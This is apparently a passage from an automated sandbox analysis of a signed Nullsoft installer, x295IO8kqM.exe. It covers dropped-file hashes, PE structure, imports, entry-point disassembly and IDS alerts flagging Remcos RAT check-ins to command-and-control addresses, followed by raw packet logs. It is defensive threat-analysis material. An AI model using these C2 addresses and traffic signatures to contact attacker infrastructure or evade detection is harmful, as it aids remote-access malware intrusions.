                                                Category:dropped
                                                Size (bytes):431740
                                                Entropy (8bit):7.644935415631374
                                                Encrypted:false
                                                SSDEEP:12288:c1zUqvApIRXyOZ2Gik1rnjkzcyoH4m0dfr0:cUAApwZIkhjqVoH4m0dfr0
                                                MD5:15EE32F7FCED24502F1CFDA83BC30564
                                                SHA1:A8966BE8B3524E3A91CF50F0EBB108D5862B4945
                                                SHA-256:FD74364F0AD6D6C8756B735C011E2722F3445F97B6380A5ECFC06CF2C4C4CE1D
                                                SHA-512:F2AF6F0723B19DF66105B68660F45C4B1D1E24CB1E9334ECEC31DEA9724A6AB69DF83B975EF4C60E131F44286A6A95945ADD54C390C7C964F029090F9F904162
                                                Malicious:false
                                                Preview:....b............tttt.......S.....,,,......7....999...uu..}.............iii...................................NN...vvv..................ooo............mm. ....d.......P...=....ff..........k................\\\\\\\......mm............................2222...............................:......==..........Y..................nnnnn...........................................q.2..b.............................Q.6.kk....8...............................................r....RRRR.....9.~...___.8..................o................xx............................00.......{.........ZZ..............*................!..............+.............SSS..t..`..l...QQQ.....b..33............''''........W.................[[[....n......U......)......8.{{................++..h............G....{...................?.@..............................................UUU.....p.................11..i...........................................Y.f...............fff.O............................g....T..ddddd....9.U..........9
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):517
                                                Entropy (8bit):4.28695415263639
                                                Encrypted:false
                                                SSDEEP:12:AFxklsruXF8mxfw7jypcWsxJRLDP+2dRXlLYfRiMojPuriVXaO8LGM8AYBRwirZm:AeY8F8mxI7Ggz+2rFY5zdiVaF8AYBRFo
                                                MD5:29E15243C8EC49A2171D36C391321AE6
                                                SHA1:9EEFCFEE919E2A0D89DC0B97F4085B783F509EF1
                                                SHA-256:CD0477C515C42581AEF982E4638AF7D834EDF35E05E2A86F9B0DE789504A8AB3
                                                SHA-512:936E9E5903C112FFE9D0E644448E8C0829F27A4C8CCF282CBF40BD4780D3770BF8F9B504805A23FC5126AEEDE2EFDE1036E40625308D8A98FD559117AF84F30F
                                                Malicious:false
                                                Preview:calc frergruppe arkaismen kreskoler sekvensnummers galena iterationernes navicerts twills advertency..interavailability outpulls gennemskrivningerne emancipationstrangs navajos,reedify fortvivlelsens socialitetens livvagter husblasens iodids..eklektikere preadjectivally hypervitalizations apsu.altsaxofonerne sleepwalker plentifully skyldsprgsmaalene forureningsbelastnings kokottes panoramic chaconner reguladetri elektrisering..newyorkeres copsewood detektiver anthologist sikkerhedstjeneste analyseforms alcohols.
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):242790
                                                Entropy (8bit):1.2523928432688356
                                                Encrypted:false
                                                SSDEEP:768:DII5cq3LYeeYqRIebHX8Y3JlYSdc8KILIQZmoiLFPQ9tfpjptwEbTlPHFayB1gY3:hejbeQ1rwOKFE9R
                                                MD5:F1636842411072037DE463D4AE982587
                                                SHA1:CED8C7FB442655B7C56F83A93698C313FD8BFD0E
                                                SHA-256:322D45C0EA26612607DCAE2499F52562949AC9E1AA54A1EBAB0B8EF5130647F4
                                                SHA-512:1D0686F8847AAFC1763968EAB79611E764A79ECDBEFF80798325E417E7298281CB317BC4EB5382F294A9024EE0E964BF196287D5168578C20419767CBC2B68AC
                                                Malicious:false
                                                Preview:...............................................1.....................................................................................................4.................[..|........U..................................E.......................................................M...................s)......u.................................$................8..............E................0............;...................................................D..................{...............................................8.....<...r........3..0.........]........................U........s.............V.........!...............................:.........n......4......................................:....................................................^..............z......j.................................t.o................................. .....".............................................Y...........................................................z...................................................
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):421406
                                                Entropy (8bit):1.2497656660112648
                                                Encrypted:false
                                                SSDEEP:1536:T3O5HFns+AagJrEiTnkpBy8tXRloz59eBqrcR:ToYrEiTkLyCBlozr
                                                MD5:558E7F447D2CEFDE136F69DFA6BBD6F8
                                                SHA1:32F1B96D23838B5B9A06D411A6BDECA19017276C
                                                SHA-256:0AF726ED20E9AE154BF09DC68A80E145B328A3BCE63DB3620B2C03489A12E157
                                                SHA-512:1A1D137F368B7BA17DCAFF109BA501719CE1C3604B74815F63C8AE9D3D5AF1A17FA7D084A9DF9AEF245D9E45A0FE8E50592EF64C37E8F105A74F1136CF8B309D
                                                Malicious:false
                                                Preview:....[.................................................................z..................................................................=.................X.....(.... ..........................................................................................4...........................S.......................G..........\...................%v.........................~.......x........$....................V.........................................................................................I.o..............................................................................................................................................].............e..................f........................... ...........................'....?............y.......,..........................V.....L.......................................................b...................{...............................................................................................J..l..........................'.........
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):347611
                                                Entropy (8bit):1.2637158874478889
                                                Encrypted:false
                                                SSDEEP:768:aBdieg0m7BZ1J9gccyxpAx+TnC58A3cd9kW+08rTYgcnfb40ZOL8yV08rg7l7/fO:Pblbd8lYWYBVcqW5ainT5j
                                                MD5:085072D5A06045F20E39D2677C2DF661
                                                SHA1:D3516D4DD491B98985229F2E2C63EF60C393324B
                                                SHA-256:3D6D6062D5866D5044F9A402443046EC9BBD3477247F576A509425A4C37BA5A5
                                                SHA-512:9292B6260CFF9328171AEAE8C904268EE4637DD290D969048168242DC6F8F0FC5E6EAB478CAA1E1EE1F8FD63E0FC3FD47B3DF435A6DD5296C682D3053E8EC4CC
                                                Malicious:false
                                                Preview:.............................................................................j...................m................:.............A...............................................................................o4..................... ............................................................}..............................g.......................-.........................................................;..........B..'........S................W..........:....................[..........D..........................................o..................(.................G...x.........................................................+........................... .................................I..................}.m.......9.............0...........q....?..<....U.....................................v...................w.................................................................F.....................R....................A................................................................S.......
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 42535295865117307932921825928971026432.000000
                                                Category:dropped
                                                Size (bytes):216675
                                                Entropy (8bit):1.2568145689844663
                                                Encrypted:false
                                                SSDEEP:768:z1qHQGWXg6kQ37VkNAph5N/jlvAcGqYPxLGKNzqua+/bg7/sY7PKlGaBKQdMLbaO:BO/10gpLH8gcw45NrrG
                                                MD5:99322017D6047E10C197404E4BEE8E49
                                                SHA1:9074195B58B1FAD209AEB626AE388478D3C95BD7
                                                SHA-256:933FD146A379E83E28A56FB34767BC341CD35EF400B81720B42ED04806A6301B
                                                SHA-512:8A18F1B4CD8945F9173FA7244DE7DFCEE2BA8A73B9B7DD8014AA55D60563006CA4A1311F0261125B8CDE9EF5754212BF725B4A74EF4FF3380F79283F94FB02E9
                                                Malicious:false
                                                Preview:............................................s......................................................................................................................$......,........U...................y..........................Q........................................................................R.......l...............L...............j...............C..............................Q...........:..............................................................................+...............I...@..............................+.....................................k...............o..........a...........w.............I..............................6.................r......................!....................*.........................................c..................................................>....................5.....,...............~....$...........#...................\........................+...;......................y..............................................................
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:dBase III DBT, version number 0, next free block index 524288
                                                Category:dropped
                                                Size (bytes):399862
                                                Entropy (8bit):1.2528103191788533
                                                Encrypted:false
                                                SSDEEP:1536:/TWzMETKRf3PYuaN4LZRkUwLJU8YsQxi0329bzF:EMEYffXaN4LZRkUwPQxLG9bz
                                                MD5:4BF0A3825CAD70890226D0E19A627D6F
                                                SHA1:76379634B52BF9E0A2B3899D898B7F3D90211C8B
                                                SHA-256:672056535A58F5B0C32ECA0CD8B16F789B99CF6DC59A3BFF17A8D10ADBFE43C0
                                                SHA-512:9A8FA390D411DA12946A8883DC72360C276CCEEDE69B1CA6BA035EF2A101A96E8021D4362F275CB3518CE9C3A2EF1CEFC4F53B900B9B36417065203285F01F18
                                                Malicious:false
                                                Preview:......................................................W.A......p.....................$.........................................................5h....................x..................A.........................................R...B.....................................S.................Q............................................................................................................................................................................................I...........................................................................V..,........q..................z..........m......%..............>...........................................................................a3.............0.o....................C.............................................................*............R}............................................8..................#..\..9......................3......0..................................n...........................................................
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):316359
                                                Entropy (8bit):1.252132386894124
                                                Encrypted:false
                                                SSDEEP:768:0HBsdgdzXHL7b0z5dlku1v9mUKs6euLzaI0uP66CywW+KByir/syHfTN63mTozXf:jm+rJOvYmaMQx0OWw
                                                MD5:7867E4681C981D4554C6AF7DD0D2C908
                                                SHA1:BA79D1357963350803AA9B3264D12BB5076F6A7C
                                                SHA-256:7206FB671880131F18F6B60DADDC4E270B5578898515F15A8B8930015BD59BE6
                                                SHA-512:D6500314EB8FEA24BAD4D64CE476094B666D0F66C7D7A691AB0548F1EF62759DBF8AA1932431D4D8B09895F00E79D60164C71F8DF8A38EE0252594411F7C2067
                                                Malicious:false
                                                Preview:..<.........................M...............................E.'.....G.......t.....(.....d.rK....................................... .................................................8..................&.......T...........................J,................................................0.............S.............R......................................................................n.................................................................................................`...........................................................................s....................u...........7.....................x..3......|................[.....................................................................x............2............................................C.....I.......`...................................Y..............r..................................................................4..........................................................................................5......
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.755431424414754
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:x295IO8kqM.exe
                                                File size:1'044'016 bytes
                                                MD5:3e4417c519a6dc532e433ad673bfa553
                                                SHA1:a724189bc732612dd68bc0ce7f7ac9ffabbd89b9
                                                SHA256:6e3fa4568a26535e48ab78ab8cc6e63fc96eb9262097f85d8c66d580dd7cd167
                                                SHA512:798fe3ed267aeee8378666e7d986855eebb2d5de45100fc8b34ce1e62464e64e62889b7d58f1a69e2404a8e78266d7dd5e55115a053b284bc1c8c9317f9d497c
                                                SSDEEP:24576:SebTzoICQUf46BCnFSRopbwUg+ygUEFD70+LS:SebTzHCQUA6BCnF6+bg+ygNDQ+2
                                                TLSH:6C257A195D6EE817EBA14673717B94DA611C6CC5A3F020FF2B05306B252CBE882F716E
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@
                                                Icon Hash:7140457192753373
                                                Entrypoint:0x40326a
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x57956391 [Mon Jul 25 00:55:45 2016 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                Signature Valid:false
                                                Signature Issuer:CN=Farmage, O=Farmage, L=Ilheu, C=FR
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 28/09/2024 09:05:03 28/09/2027 09:05:03
                                                Subject Chain
                                                • CN=Farmage, O=Farmage, L=Ilheu, C=FR
                                                Version:3
                                                Thumbprint MD5:DA6D32247BE6553CED61F875C82BD44E
                                                Thumbprint SHA-1:A2E7E57741442428F75FE1BD361A4E69364E98E5
                                                Thumbprint SHA-256:94A96E07532156A2ED953AB891E14F43321AA6B05200F26CED2F62F2A7A899E7
                                                Serial:16D199DBB787CA8A887AC166AC8541D0979BE830
                                                Instruction
                                                sub esp, 000002D4h
                                                push ebx
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+14h], ebx
                                                mov dword ptr [esp+10h], 004092E0h
                                                mov dword ptr [esp+1Ch], ebx
                                                call dword ptr [004070B0h]
                                                call dword ptr [004070ACh]
                                                cmp ax, 00000006h
                                                je 00007F99042EB853h
                                                push ebx
                                                call 00007F99042EE994h
                                                cmp eax, ebx
                                                je 00007F99042EB849h
                                                push 00000C00h
                                                call eax
                                                mov esi, 004072B8h
                                                push esi
                                                call 00007F99042EE90Eh
                                                push esi
                                                call dword ptr [0040715Ch]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], 00000000h
                                                jne 00007F99042EB82Ch
                                                push ebp
                                                push 00000009h
                                                call 00007F99042EE966h
                                                push 00000007h
                                                call 00007F99042EE95Fh
                                                mov dword ptr [00429204h], eax
                                                call dword ptr [0040703Ch]
                                                push ebx
                                                call dword ptr [004072A4h]
                                                mov dword ptr [004292B8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+34h]
                                                push 000002B4h
                                                push eax
                                                push ebx
                                                push 004206A8h
                                                call dword ptr [00407188h]
                                                push 004092C8h
                                                push 00428200h
                                                call 00007F99042EE548h
                                                call dword ptr [004070A8h]
                                                mov ebp, 00434000h
                                                push eax
                                                push ebp
                                                call 00007F99042EE536h
                                                push ebx
                                                call dword ptr [00407174h]
                                                add word ptr [eax], 0000h
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x75040xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x2b4a0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xfe5480x8e8
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b4.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x5ff90x600034f0469eb860d5ecf0e52ef9d3820a60False0.6667073567708334data6.4734859396670705IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x13a40x1400848ecd58951d0a4cfe8ec8cfce6b20d1False0.452734375data5.125569346027248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x202f80x6003953dbb7217e7539ee75e90871f7aef9False0.4947916666666667data3.9050018847265378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x2a0000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x480000x2b4a00x2b600901cd8d933095b041c4d5ad99c406b66False0.18056556195965417data4.754114267912815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x483880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.07176446232106944
                                                RT_ICON0x58bb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.10965419381963422
                                                RT_ICON0x620580x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.13382624768946397
                                                RT_ICON0x674e00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.13350259801606046
                                                RT_ICON0x6b7080x2eadPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9818394844756884
                                                RT_ICON0x6e5b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.19533195020746888
                                                RT_ICON0x70b600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.25422138836772984
                                                RT_ICON0x71c080x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.3635245901639344
                                                RT_ICON0x725900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4787234042553192
                                                RT_DIALOG0x729f80x120dataEnglishUnited States0.5138888888888888
                                                RT_DIALOG0x72b180x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x72c380xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0x72d000x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x72d600x84dataEnglishUnited States0.7348484848484849
                                                RT_VERSION0x72de80x290MS Windows COFF PA-RISC object fileEnglishUnited States0.5228658536585366
                                                RT_MANIFEST0x730780x422XML 1.0 document, ASCII text, with very long lines (1058), with no line terminatorsEnglishUnited States0.5122873345935728
                                                DLLImport
                                                KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-12-13T08:50:06.791648+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.11.2049717192.169.69.262889TCP
                                                2024-12-13T08:50:35.665130+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049714172.217.215.102443TCP
                                                2024-12-13T08:50:48.350112+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.11.2049716192.169.69.262879TCP
                                                2024-12-13T08:50:49.555506+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.11.2049718172.111.244.1132879TCP
                                                2024-12-13T08:50:49.800765+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1172.111.244.1132879192.168.11.2049718TCP
                                                2024-12-13T08:50:50.582431+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.11.2049719178.237.33.5080TCP
                                                2024-12-13T08:53:00.444282+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1172.111.244.1132879192.168.11.2049718TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 13, 2024 08:50:35.169603109 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.169620037 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.169737101 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.182007074 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.182020903 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.423099041 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.423355103 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.424644947 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.424949884 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.451565981 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.451603889 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.452393055 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.452543974 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.457572937 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.498347998 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.665188074 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.665283918 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.665371895 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.665463924 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.665486097 CET44349714172.217.215.102192.168.11.20
                                                Dec 13, 2024 08:50:35.665622950 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.665688038 CET49714443192.168.11.20172.217.215.102
                                                Dec 13, 2024 08:50:35.829900980 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:35.829935074 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:35.830173969 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:35.830348015 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:35.830368996 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:36.075802088 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:36.076020956 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:36.079479933 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:36.079499006 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:36.079925060 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:36.080051899 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:36.080313921 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:36.122215033 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:38.986263990 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:38.986468077 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:38.986468077 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.002549887 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.002784014 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.002826929 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.019201040 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.019440889 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.019476891 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.019705057 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.100526094 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.100733042 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.100770950 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.100985050 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.104718924 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.104882002 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.104918003 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.105120897 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.113007069 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.113217115 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.113255024 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.113415003 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.121316910 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.121503115 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.121543884 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.121731997 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.129626989 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.129869938 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.129906893 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.130090952 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.137981892 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.138180971 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.138226986 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.138438940 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.146343946 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.146559954 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.146595955 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.146859884 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.154599905 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.154774904 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.154810905 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.155039072 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.162853003 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.163078070 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.163115025 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.163347006 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.171139956 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.172079086 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.172117949 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.172594070 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.179433107 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.179647923 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.179685116 CET44349715108.177.122.132192.168.11.20
